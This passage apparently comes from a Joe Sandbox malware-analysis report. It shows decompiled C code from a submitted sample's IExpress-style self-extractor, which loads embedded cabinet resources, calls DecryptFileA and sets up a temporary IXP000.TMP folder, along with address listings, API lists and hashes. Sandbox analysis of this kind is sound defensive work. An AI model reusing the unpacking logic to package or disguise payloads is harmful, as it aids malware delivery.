                                                                                                                                                                                                        					__imp__#22(_t34, "*MEMCAB", 0xe81140, 0, E00E84CD0, 0, 0xe89140); // executed
                                                                                                                                                                                                        					_t37 = _t10;
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#23(_t34); // executed
                                                                                                                                                                                                        					if(_t10 != 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 =  *0xe88584; // 0x0
                                                                                                                                                                                                        					E00E844B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_t12 =  *0xe89140; // 0x0
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						FreeResource(_t12);
                                                                                                                                                                                                        						 *0xe89140 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						_t47 =  *0xe891d8; // 0x0
                                                                                                                                                                                                        						if(_t47 == 0) {
                                                                                                                                                                                                        							E00E844B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(( *0xe88a38 & 0x00000001) == 0 && ( *0xe89a34 & 0x00000001) == 0) {
                                                                                                                                                                                                        						SendMessageA( *0xe88584, 0xfa1, _t37, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t37;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}
















                                                                                                                                                                                                        0x00e84fe0
                                                                                                                                                                                                        0x00e84fe6
                                                                                                                                                                                                        0x00e84ff9
                                                                                                                                                                                                        0x00e8500d
                                                                                                                                                                                                        0x00e85013
                                                                                                                                                                                                        0x00e8501a
                                                                                                                                                                                                        0x00e85163
                                                                                                                                                                                                        0x00e85163
                                                                                                                                                                                                        0x00e85020
                                                                                                                                                                                                        0x00e85027
                                                                                                                                                                                                        0x00e85037
                                                                                                                                                                                                        0x00e85051
                                                                                                                                                                                                        0x00e85051
                                                                                                                                                                                                        0x00e85057
                                                                                                                                                                                                        0x00e8505e
                                                                                                                                                                                                        0x00e850a7
                                                                                                                                                                                                        0x00e850ad
                                                                                                                                                                                                        0x00e850b4
                                                                                                                                                                                                        0x00e850e8
                                                                                                                                                                                                        0x00e850e8
                                                                                                                                                                                                        0x00e850ee
                                                                                                                                                                                                        0x00e850ff
                                                                                                                                                                                                        0x00e85104
                                                                                                                                                                                                        0x00e85106
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85106
                                                                                                                                                                                                        0x00e850cd
                                                                                                                                                                                                        0x00e850d3
                                                                                                                                                                                                        0x00e850da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e850dd
                                                                                                                                                                                                        0x00e850e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85060
                                                                                                                                                                                                        0x00e85060
                                                                                                                                                                                                        0x00e85070
                                                                                                                                                                                                        0x00e85075
                                                                                                                                                                                                        0x00e85107
                                                                                                                                                                                                        0x00e85107
                                                                                                                                                                                                        0x00e8510e
                                                                                                                                                                                                        0x00e85111
                                                                                                                                                                                                        0x00e85117
                                                                                                                                                                                                        0x00e85117
                                                                                                                                                                                                        0x00e8511f
                                                                                                                                                                                                        0x00e85121
                                                                                                                                                                                                        0x00e85127
                                                                                                                                                                                                        0x00e85135
                                                                                                                                                                                                        0x00e85135
                                                                                                                                                                                                        0x00e85127
                                                                                                                                                                                                        0x00e85141
                                                                                                                                                                                                        0x00e85159
                                                                                                                                                                                                        0x00e85159
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8515f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846A0
                                                                                                                                                                                                          • Part of subcall function 00E8468F: SizeofResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846A9
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846C3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LoadResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846CC
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LockResource.KERNEL32(00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846D3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: memcpy_s.MSVCRT ref: 00E846E5
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846EF
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00E84FFE
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00E85006
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00E8500D
                                                                                                                                                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 00E85030
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00E85037
                                                                                                                                                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 00E8504A
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00E85051
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00E85111
                                                                                                                                                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00E85159
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                        • API String ID: 1305606123-2642027498
                                                                                                                                                                                                        • Opcode ID: 59ef07d4dc852fccff5dea3df1c5ce91909cc626489fe8f5a80159ea44a07e1d
                                                                                                                                                                                                        • Instruction ID: 25199d8f7938e6b2393cbebd9ee5842785623a4c3d03ae72cb2f1be778ee2e3b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 59ef07d4dc852fccff5dea3df1c5ce91909cc626489fe8f5a80159ea44a07e1d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D31A4B16827026FE7207B62AE8DF67369DE744B59F092025F90EB62E2DE648C048751
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 450 e82f1d-e82f3d 451 e82f6c-e82f73 call e85164 450->451 452 e82f3f-e82f46 450->452 460 e82f79-e82f80 call e855a0 451->460 461 e83041 451->461 454 e82f48 call e851e5 452->454 455 e82f5f-e82f66 call e83a3f 452->455 462 e82f4d-e82f4f 454->462 455->451 455->461 460->461 468 e82f86-e82fbe GetSystemDirectoryA call e8658a LoadLibraryA 460->468 464 e83043-e83053 call e86ce0 461->464 462->461 465 e82f55-e82f5d 462->465 465->451 465->455 472 e82fc0-e82fd4 GetProcAddress 468->472 473 e82ff7-e83004 FreeLibrary 468->473 472->473 476 e82fd6-e82fee DecryptFileA 472->476 474 e83006-e8300c 473->474 475 e83017-e83024 SetCurrentDirectoryA 473->475 474->475 477 e8300e call e8621e 474->477 478 e83054-e8305a 475->478 479 e83026-e8303c call e844b9 call e86285 475->479 476->473 490 e82ff0-e82ff5 476->490 488 e83013-e83015 477->488 480 e8305c call e83b26 478->480 481 e83065-e8306c 478->481 479->461 491 e83061-e83063 480->491 486 e8307c-e83089 481->486 487 e8306e-e83075 call e8256d 481->487 493 e8308b-e83091 486->493 494 e830a1-e830a9 486->494 496 e8307a 487->496 488->461 488->475 490->473 491->461 491->481 493->494 497 e83093 call e83ba2 493->497 499 e830ab-e830ad 494->499 500 e830b4-e830b7 494->500 496->486 504 e83098-e8309a 497->504 499->500 502 e830af call e84169 499->502 500->464 502->500 504->461 505 e8309c 504->505 505->494
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00E82F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v272;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        				intOrPtr* _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        				int _t47;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t59;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t43 = __edx;
                                                                                                                                                                                                        				_t9 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                        				if( *0xe88a38 != 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					_t11 = E00E85164(_t52);
                                                                                                                                                                                                        					_t53 = _t11;
                                                                                                                                                                                                        					if(_t11 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_t12 = 0;
                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                        						return E00E86CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t14 = E00E855A0(_t53); // executed
                                                                                                                                                                                                        					if(_t14 == 0) {
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t45 = 0x105;
                                                                                                                                                                                                        						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                        						_t43 = 0x105;
                                                                                                                                                                                                        						_t40 =  &_v272;
                                                                                                                                                                                                        						E00E8658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                        						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                        						_t44 = 0;
                                                                                                                                                                                                        						if(_t36 != 0) {
                                                                                                                                                                                                        							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                        							_v276 = _t31;
                                                                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                                                                        								_t45 = _t47;
                                                                                                                                                                                                        								_t40 = _t31;
                                                                                                                                                                                                        								 *0xe8a288("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                                                                                                                                                        								_v276();
                                                                                                                                                                                                        								if(_t47 != _t47) {
                                                                                                                                                                                                        									_t40 = 4;
                                                                                                                                                                                                        									asm("int 0x29");
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						FreeLibrary(_t36);
                                                                                                                                                                                                        						_t58 =  *0xe88a24 - _t44; // 0x0
                                                                                                                                                                                                        						if(_t58 != 0) {
                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                                                                                                                                                        							if(_t21 != 0) {
                                                                                                                                                                                                        								__eflags =  *0xe88a2c - _t44; // 0x0
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									L20:
                                                                                                                                                                                                        									__eflags =  *0xe88d48 & 0x000000c0;
                                                                                                                                                                                                        									if(( *0xe88d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                        										_t41 =  *0xe89a40; // 0x3, executed
                                                                                                                                                                                                        										_t26 = E00E8256D(_t41); // executed
                                                                                                                                                                                                        										_t44 = _t26;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t22 =  *0xe88a24; // 0x0
                                                                                                                                                                                                        									 *0xe89a44 = _t44;
                                                                                                                                                                                                        									__eflags = _t22;
                                                                                                                                                                                                        									if(_t22 != 0) {
                                                                                                                                                                                                        										L26:
                                                                                                                                                                                                        										__eflags =  *0xe88a38;
                                                                                                                                                                                                        										if( *0xe88a38 == 0) {
                                                                                                                                                                                                        											__eflags = _t22;
                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                        												E00E84169(__eflags);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t12 = 1;
                                                                                                                                                                                                        										goto L17;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags =  *0xe89a30 - _t22; // 0x0
                                                                                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                                                                                        											goto L26;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t25 = E00E83BA2(); // executed
                                                                                                                                                                                                        										__eflags = _t25;
                                                                                                                                                                                                        										if(_t25 == 0) {
                                                                                                                                                                                                        											goto L16;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t22 =  *0xe88a24; // 0x0
                                                                                                                                                                                                        										goto L26;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t27 = E00E83B26(_t40, _t44);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t43 = 0x4bc;
                                                                                                                                                                                                        							E00E844B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                        							 *0xe89124 = E00E86285();
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t59 =  *0xe89a30 - _t44; // 0x0
                                                                                                                                                                                                        						if(_t59 != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = E00E8621E(); // executed
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t49 =  *0xe88a24;
                                                                                                                                                                                                        				if( *0xe88a24 != 0) {
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					_t34 = E00E83A3F(_t51);
                                                                                                                                                                                                        					_t52 = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E00E851E5(_t49) == 0) {
                                                                                                                                                                                                        					goto L16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t51 =  *0xe88a38;
                                                                                                                                                                                                        				if( *0xe88a38 != 0) {
                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                                        			}




























                                                                                                                                                                                                        0x00e82f1d
                                                                                                                                                                                                        0x00e82f28
                                                                                                                                                                                                        0x00e82f2f
                                                                                                                                                                                                        0x00e82f3d
                                                                                                                                                                                                        0x00e82f6c
                                                                                                                                                                                                        0x00e82f6c
                                                                                                                                                                                                        0x00e82f71
                                                                                                                                                                                                        0x00e82f73
                                                                                                                                                                                                        0x00e83041
                                                                                                                                                                                                        0x00e83041
                                                                                                                                                                                                        0x00e83043
                                                                                                                                                                                                        0x00e83053
                                                                                                                                                                                                        0x00e83053
                                                                                                                                                                                                        0x00e82f79
                                                                                                                                                                                                        0x00e82f80
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82f86
                                                                                                                                                                                                        0x00e82f86
                                                                                                                                                                                                        0x00e82f93
                                                                                                                                                                                                        0x00e82f9e
                                                                                                                                                                                                        0x00e82fa0
                                                                                                                                                                                                        0x00e82fa6
                                                                                                                                                                                                        0x00e82fb8
                                                                                                                                                                                                        0x00e82fba
                                                                                                                                                                                                        0x00e82fbe
                                                                                                                                                                                                        0x00e82fc6
                                                                                                                                                                                                        0x00e82fcc
                                                                                                                                                                                                        0x00e82fd4
                                                                                                                                                                                                        0x00e82fd6
                                                                                                                                                                                                        0x00e82fd8
                                                                                                                                                                                                        0x00e82fe0
                                                                                                                                                                                                        0x00e82fe6
                                                                                                                                                                                                        0x00e82fee
                                                                                                                                                                                                        0x00e82ff0
                                                                                                                                                                                                        0x00e82ff5
                                                                                                                                                                                                        0x00e82ff5
                                                                                                                                                                                                        0x00e82fee
                                                                                                                                                                                                        0x00e82fd4
                                                                                                                                                                                                        0x00e82ff8
                                                                                                                                                                                                        0x00e82ffe
                                                                                                                                                                                                        0x00e83004
                                                                                                                                                                                                        0x00e83017
                                                                                                                                                                                                        0x00e8301c
                                                                                                                                                                                                        0x00e83024
                                                                                                                                                                                                        0x00e83054
                                                                                                                                                                                                        0x00e8305a
                                                                                                                                                                                                        0x00e83065
                                                                                                                                                                                                        0x00e83065
                                                                                                                                                                                                        0x00e8306c
                                                                                                                                                                                                        0x00e8306e
                                                                                                                                                                                                        0x00e83075
                                                                                                                                                                                                        0x00e8307a
                                                                                                                                                                                                        0x00e8307a
                                                                                                                                                                                                        0x00e8307c
                                                                                                                                                                                                        0x00e83081
                                                                                                                                                                                                        0x00e83087
                                                                                                                                                                                                        0x00e83089
                                                                                                                                                                                                        0x00e830a1
                                                                                                                                                                                                        0x00e830a1
                                                                                                                                                                                                        0x00e830a9
                                                                                                                                                                                                        0x00e830ab
                                                                                                                                                                                                        0x00e830ad
                                                                                                                                                                                                        0x00e830af
                                                                                                                                                                                                        0x00e830af
                                                                                                                                                                                                        0x00e830ad
                                                                                                                                                                                                        0x00e830b6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8308b
                                                                                                                                                                                                        0x00e8308b
                                                                                                                                                                                                        0x00e83091
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83093
                                                                                                                                                                                                        0x00e83098
                                                                                                                                                                                                        0x00e8309a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8309c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8309c
                                                                                                                                                                                                        0x00e83089
                                                                                                                                                                                                        0x00e8305c
                                                                                                                                                                                                        0x00e83061
                                                                                                                                                                                                        0x00e83063
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83063
                                                                                                                                                                                                        0x00e8302b
                                                                                                                                                                                                        0x00e83032
                                                                                                                                                                                                        0x00e8303c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8303c
                                                                                                                                                                                                        0x00e83006
                                                                                                                                                                                                        0x00e8300c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8300e
                                                                                                                                                                                                        0x00e83015
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83015
                                                                                                                                                                                                        0x00e82f80
                                                                                                                                                                                                        0x00e82f3f
                                                                                                                                                                                                        0x00e82f46
                                                                                                                                                                                                        0x00e82f5f
                                                                                                                                                                                                        0x00e82f5f
                                                                                                                                                                                                        0x00e82f64
                                                                                                                                                                                                        0x00e82f66
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82f66
                                                                                                                                                                                                        0x00e82f4f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82f55
                                                                                                                                                                                                        0x00e82f5d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00E82F93
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00E82FB2
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00E82FC6
                                                                                                                                                                                                        • DecryptFileA.ADVAPI32 ref: 00E82FE6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00E82FF8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E8301C
                                                                                                                                                                                                          • Part of subcall function 00E851E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00E82F4D,?,00000002,00000000), ref: 00E85201
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                        • API String ID: 2126469477-1173327654
                                                                                                                                                                                                        • Opcode ID: 7db9ae2b593a1076a5e86df937adf7b51083abf19633aaefdfa96de780ca0883
                                                                                                                                                                                                        • Instruction ID: 944d291a57b9e2a2f0f69a74c9be1369b89f4a3ab0f68027614c620a8472376c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7db9ae2b593a1076a5e86df937adf7b51083abf19633aaefdfa96de780ca0883
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62410B31A006055EDB34BB729E4966A33E8EB44F49F0424A6EE0DF21D2EF74CE84CB51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 522 e85467-e85484 523 e8548a-e85490 call e853a1 522->523 524 e8551c-e85528 call e81680 522->524 527 e85495-e85497 523->527 528 e8552d-e85539 call e858c8 524->528 529 e8549d-e854c0 call e81781 527->529 530 e85581-e85583 527->530 537 e8553b-e85545 CreateDirectoryA 528->537 538 e8554d-e85552 528->538 541 e8550c-e8551a call e8658a 529->541 542 e854c2-e854d8 GetSystemInfo 529->542 533 e8558d-e8559d call e86ce0 530->533 544 e85577-e8557c call e86285 537->544 545 e85547 537->545 539 e85554-e85557 call e8597d 538->539 540 e85585-e8558b 538->540 551 e8555c-e8555e 539->551 540->533 541->528 549 e854da-e854dd 542->549 550 e854fe 542->550 544->530 545->538 555 e854df-e854e2 549->555 556 e854f7-e854fc 549->556 552 e85503-e85507 call e8658a 550->552 551->540 557 e85560-e85566 551->557 552->541 559 e854f0-e854f5 555->559 560 e854e4-e854e7 555->560 556->552 557->530 562 e85568-e85575 RemoveDirectoryA 557->562 559->552 560->541 561 e854e9-e854ee 560->561 561->552 562->530
                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00E85467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR* _t48;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t10 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				if(__edx == 0) {
                                                                                                                                                                                                        					_t48 = 0xe891e4;
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E00E81680(0xe891e4, 0x104);
                                                                                                                                                                                                        					L14:
                                                                                                                                                                                                        					_t13 = E00E858C8(_t48); // executed
                                                                                                                                                                                                        					if(_t13 != 0) {
                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                        						_t42 = _a4;
                                                                                                                                                                                                        						if(_a4 == 0) {
                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                        							 *0xe89124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        							L24:
                                                                                                                                                                                                        							return E00E86CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t16 = E00E8597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                        						if(_t16 != 0) {
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t61 =  *0xe88a20; // 0x0
                                                                                                                                                                                                        						if(_t61 != 0) {
                                                                                                                                                                                                        							 *0xe88a20 = 0;
                                                                                                                                                                                                        							RemoveDirectoryA(_t48);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L22:
                                                                                                                                                                                                        						_t14 = 0;
                                                                                                                                                                                                        						goto L24;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                        						 *0xe89124 = E00E86285();
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xe88a20 = 1;
                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 =  &_v268;
                                                                                                                                                                                                        				_t20 = E00E853A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                        				if(_t20 == 0) {
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t48 = 0xe891e4;
                                                                                                                                                                                                        				E00E81781(0xe891e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                        				if(( *0xe89a34 & 0x00000020) == 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E00E8658A(_t48, 0x104, 0xe81140);
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				GetSystemInfo( &_v304);
                                                                                                                                                                                                        				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					_push("i386");
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					E00E8658A(_t48, 0x104);
